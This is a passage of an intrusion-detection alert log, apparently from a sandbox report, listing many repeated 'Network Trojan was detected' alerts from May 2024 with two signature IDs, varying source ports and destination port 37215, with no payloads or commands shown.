                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928527
                SID:2835222
                Source Port:44320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.797732
                SID:2829579
                Source Port:60012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975155
                SID:2829579
                Source Port:36240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.827273
                SID:2829579
                Source Port:49000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.070385
                SID:2835222
                Source Port:40258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.503618
                SID:2835222
                Source Port:35116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.811814
                SID:2829579
                Source Port:56986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271440
                SID:2835222
                Source Port:38794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.788400
                SID:2835222
                Source Port:51900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858650
                SID:2829579
                Source Port:58408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.873678
                SID:2829579
                Source Port:39212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264959
                SID:2829579
                Source Port:53716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362635
                SID:2835222
                Source Port:37972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.971675
                SID:2829579
                Source Port:36862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784818
                SID:2829579
                Source Port:40874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.066486
                SID:2829579
                Source Port:51594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.180374
                SID:2835222
                Source Port:40490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617257
                SID:2829579
                Source Port:43076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896360
                SID:2829579
                Source Port:35356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.518023
                SID:2829579
                Source Port:41012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225690
                SID:2829579
                Source Port:38874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223441
                SID:2835222
                Source Port:56882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.914915
                SID:2835222
                Source Port:59616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.165302
                SID:2835222
                Source Port:33978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464542
                SID:2829579
                Source Port:52584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025439
                SID:2829579
                Source Port:44300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715301
                SID:2835222
                Source Port:52038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321725
                SID:2835222
                Source Port:54720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465317
                SID:2835222
                Source Port:33138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.519953
                SID:2835222
                Source Port:34692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610136
                SID:2835222
                Source Port:33012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.986966
                SID:2829579
                Source Port:52492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.282172
                SID:2835222
                Source Port:51156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659653
                SID:2829579
                Source Port:54064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154867
                SID:2829579
                Source Port:35390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.609964
                SID:2835222
                Source Port:35864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899324
                SID:2835222
                Source Port:42708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869599
                SID:2829579
                Source Port:53430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380842
                SID:2835222
                Source Port:53774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265839
                SID:2829579
                Source Port:41430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807060
                SID:2829579
                Source Port:44834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.745292
                SID:2835222
                Source Port:45866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559610
                SID:2835222
                Source Port:35754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.891510
                SID:2829579
                Source Port:43572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418323
                SID:2829579
                Source Port:56468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.189735
                SID:2835222
                Source Port:36626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362877
                SID:2829579
                Source Port:40614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.668972
                SID:2835222
                Source Port:57646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640500
                SID:2835222
                Source Port:56456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364512
                SID:2829579
                Source Port:54554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597873
                SID:2829579
                Source Port:46140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.837408
                SID:2835222
                Source Port:36804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.955718
                SID:2835222
                Source Port:49870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.230354
                SID:2835222
                Source Port:59656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.533976
                SID:2835222
                Source Port:43014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.034047
                SID:2835222
                Source Port:34636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385147
                SID:2835222
                Source Port:57350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870262
                SID:2829579
                Source Port:35642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374195
                SID:2835222
                Source Port:58102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730747
                SID:2829579
                Source Port:48866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.688971
                SID:2835222
                Source Port:36170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532156
                SID:2835222
                Source Port:52226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583097
                SID:2829579
                Source Port:56088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500724
                SID:2829579
                Source Port:48318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639790
                SID:2835222
                Source Port:33896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667090
                SID:2835222
                Source Port:46632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324599
                SID:2835222
                Source Port:49320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.985398
                SID:2829579
                Source Port:44866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.725594
                SID:2829579
                Source Port:60496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226967
                SID:2835222
                Source Port:38134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335244
                SID:2829579
                Source Port:57410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231505
                SID:2835222
                Source Port:34062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717002
                SID:2835222
                Source Port:47686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.444298
                SID:2835222
                Source Port:56904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207653
                SID:2835222
                Source Port:55508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223351
                SID:2835222
                Source Port:52894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655185
                SID:2829579
                Source Port:33874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074821
                SID:2835222
                Source Port:49332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614195
                SID:2829579
                Source Port:44446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.453512
                SID:2829579
                Source Port:51546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798353
                SID:2835222
                Source Port:44224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519841
                SID:2835222
                Source Port:35246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042418
                SID:2835222
                Source Port:49810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.333785
                SID:2835222
                Source Port:48536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798632
                SID:2835222
                Source Port:60658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262439
                SID:2835222
                Source Port:39558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023515
                SID:2835222
                Source Port:51298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.567434
                SID:2829579
                Source Port:47800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.215529
                SID:2829579
                Source Port:52082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166421
                SID:2829579
                Source Port:40184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038876
                SID:2835222
                Source Port:45536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076499
                SID:2835222
                Source Port:49256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653938
                SID:2835222
                Source Port:50252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.360564
                SID:2835222
                Source Port:48116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113798
                SID:2829579
                Source Port:52682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039703
                SID:2835222
                Source Port:58260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136200
                SID:2829579
                Source Port:39304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361464
                SID:2829579
                Source Port:42602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.916080
                SID:2835222
                Source Port:33476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965148
                SID:2835222
                Source Port:57228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.088113
                SID:2835222
                Source Port:48766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.002009
                SID:2829579
                Source Port:59354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169332
                SID:2835222
                Source Port:49780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.874663
                SID:2829579
                Source Port:37048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.911153
                SID:2835222
                Source Port:34654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178140
                SID:2835222
                Source Port:45786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362753
                SID:2829579
                Source Port:41640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870485
                SID:2829579
                Source Port:51924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989747
                SID:2835222
                Source Port:48584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.711109
                SID:2829579
                Source Port:50078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.275979
                SID:2835222
                Source Port:37892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437713
                SID:2829579
                Source Port:60350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155098
                SID:2829579
                Source Port:57234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765747
                SID:2829579
                Source Port:60278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.593392
                SID:2829579
                Source Port:50874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899438
                SID:2835222
                Source Port:52508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.928957
                SID:2829579
                Source Port:47078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.503428
                SID:2829579
                Source Port:35222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.783858
                SID:2829579
                Source Port:34606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171725
                SID:2835222
                Source Port:44750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437713
                SID:2835222
                Source Port:60350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472186
                SID:2835222
                Source Port:38682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667259
                SID:2835222
                Source Port:58548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385395
                SID:2835222
                Source Port:43544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024754
                SID:2829579
                Source Port:40494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856800
                SID:2835222
                Source Port:43422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329261
                SID:2829579
                Source Port:37878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415829
                SID:2829579
                Source Port:43554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.927771
                SID:2835222
                Source Port:49306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668550
                SID:2829579
                Source Port:59162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675100
                SID:2829579
                Source Port:39954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463950
                SID:2835222
                Source Port:55260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776833
                SID:2835222
                Source Port:52692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890796
                SID:2835222
                Source Port:60370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583734
                SID:2829579
                Source Port:48612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.097342
                SID:2829579
                Source Port:60934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.934881
                SID:2829579
                Source Port:58216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.913001
                SID:2835222
                Source Port:42512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982458
                SID:2829579
                Source Port:34190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.273563
                SID:2829579
                Source Port:42178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.799675
                SID:2829579
                Source Port:59596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321755
                SID:2829579
                Source Port:44936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787656
                SID:2835222
                Source Port:51814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854726
                SID:2835222
                Source Port:53918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419998
                SID:2835222
                Source Port:53840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574670
                SID:2829579
                Source Port:47950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.231665
                SID:2835222
                Source Port:49550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663530
                SID:2835222
                Source Port:51774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532611
                SID:2829579
                Source Port:51980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.287405
                SID:2835222
                Source Port:43168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.969734
                SID:2835222
                Source Port:41640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.904947
                SID:2835222
                Source Port:35334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329187
                SID:2835222
                Source Port:48574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826312
                SID:2835222
                Source Port:52318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614001
                SID:2829579
                Source Port:49214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.080308
                SID:2829579
                Source Port:42446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.435888
                SID:2835222
                Source Port:34538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419705
                SID:2829579
                Source Port:49000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499833
                SID:2835222
                Source Port:37096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.330186
                SID:2829579
                Source Port:45598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583126
                SID:2835222
                Source Port:59854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013453
                SID:2835222
                Source Port:43944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.837367
                SID:2835222
                Source Port:43140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335820
                SID:2829579
                Source Port:43284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436054
                SID:2829579
                Source Port:35584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171142
                SID:2829579
                Source Port:49128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573151
                SID:2829579
                Source Port:60158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782925
                SID:2835222
                Source Port:34974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.139829
                SID:2829579
                Source Port:38282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781360
                SID:2829579
                Source Port:32772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.936514
                SID:2835222
                Source Port:47738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773180
                SID:2829579
                Source Port:40572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.582999
                SID:2835222
                Source Port:36960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432470
                SID:2829579
                Source Port:38432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714668
                SID:2835222
                Source Port:36026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945839
                SID:2829579
                Source Port:41172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.845626
                SID:2835222
                Source Port:52778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597493
                SID:2835222
                Source Port:40622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.920080
                SID:2835222
                Source Port:44066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663828
                SID:2835222
                Source Port:52264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.144949
                SID:2835222
                Source Port:36950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.884151
                SID:2829579
                Source Port:46316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898257
                SID:2835222
                Source Port:43220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170017
                SID:2835222
                Source Port:49718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221276
                SID:2835222
                Source Port:48704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162562
                SID:2835222
                Source Port:41422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848229
                SID:2835222
                Source Port:33418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510882
                SID:2835222
                Source Port:35764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784765
                SID:2835222
                Source Port:57446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325302
                SID:2835222
                Source Port:43362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385130
                SID:2829579
                Source Port:49200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586154
                SID:2835222
                Source Port:43828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967223
                SID:2835222
                Source Port:36518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968530
                SID:2829579
                Source Port:52800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362846
                SID:2835222
                Source Port:48980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628526
                SID:2829579
                Source Port:35282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441462
                SID:2829579
                Source Port:56784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
